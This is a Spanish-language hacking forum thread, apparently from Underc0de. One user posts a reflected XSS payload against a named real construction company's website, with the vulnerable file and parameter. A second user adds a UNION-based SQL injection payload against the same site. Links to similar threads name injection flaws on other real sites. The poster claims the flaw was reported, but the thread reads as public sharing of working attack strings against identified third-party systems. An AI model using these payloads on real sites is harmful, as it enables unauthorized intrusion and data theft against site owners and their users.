[XSS] Dynasty Builders - http://www.dynastybuilders.ca/

  • 2 Respuestas
  • 1908 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado Drok3r

  • *
  • Underc0der
  • Mensajes: 51
  • Actividad:
    0%
  • Reputación 1
  • Twitter: @drok3r
    • Ver Perfil
    • RedBird
    Captura de pantalla


    Url del sitio
  • You are not allowed to view links. Register or Login[/li][/list]

        Vector
  • Archivo y Parametro: custom-gallery.php?id=[/li]
  • Payload XSS: '"><script>alert(/Drok3r - XSS /)</script>[/li]
  • PoC:[/li][/list]
    ----> You are not allowed to view links. Register or Login

        Autor
    [!] Drok3r (redbirdTEAM - CiberSecurityRECON)

        Reportado: SI

Desconectado Nobody

  • *
  • Underc0der
  • Mensajes: 197
  • Actividad:
    0%
  • Country: 00
  • Reputación 4
  • Security as art.
  • Twitter: @n0bodysec
    • Ver Perfil
    • Personal Website
¡Hola Drok3r!

Excelente XSS, pero te comento que la web también es vulnerable a SQLi, por si no lo has notado.

Payload: You are not allowed to view links. Register or Login' union select 1,version(),3,4,5,6,7,8,9,10,11 -- -

¡Saludos!
You are not allowed to view links. Register or Login

Desconectado Drok3r

  • *
  • Underc0der
  • Mensajes: 51
  • Actividad:
    0%
  • Reputación 1
  • Twitter: @drok3r
    • Ver Perfil
    • RedBird
You are not allowed to view links. Register or Login
¡Hola Drok3r!

Excelente XSS, pero te comento que la web también es vulnerable a SQLi, por si no lo has notado.

Payload: You are not allowed to view links. Register or Login' union select 1,version(),3,4,5,6,7,8,9,10,11 -- -

¡Saludos!


Aaaa que cosas.... jeje Gracias por el dato.

 

SQLI WAF Bypass y SQLI LoadFile http://www.lasemana.es/

Iniciado por hdbreaker

Respuestas: 0
Vistas: 2170
Último mensaje Julio 25, 2013, 02:55:56 am
por hdbreaker
SQLI Double Error Based http://campusvirtual.frsf.utn.edu.ar

Iniciado por hdbreaker

Respuestas: 1
Vistas: 1964
Último mensaje Febrero 19, 2013, 06:59:26 pm
por ANTRAX
SQLI Source Data http://bolivia.infoleyes.com/

Iniciado por hdbreaker

Respuestas: 0
Vistas: 2050
Último mensaje Junio 25, 2013, 10:37:19 pm
por hdbreaker
[XSS + Arbitrary File Upload] http://www.holatelcel.com

Iniciado por HckDrk

Respuestas: 2
Vistas: 2864
Último mensaje Marzo 13, 2014, 01:22:24 pm
por clavo25
SQLI Double Query http://www.mirada21.es/

Iniciado por hdbreaker

Respuestas: 0
Vistas: 1850
Último mensaje Julio 25, 2013, 02:38:04 am
por hdbreaker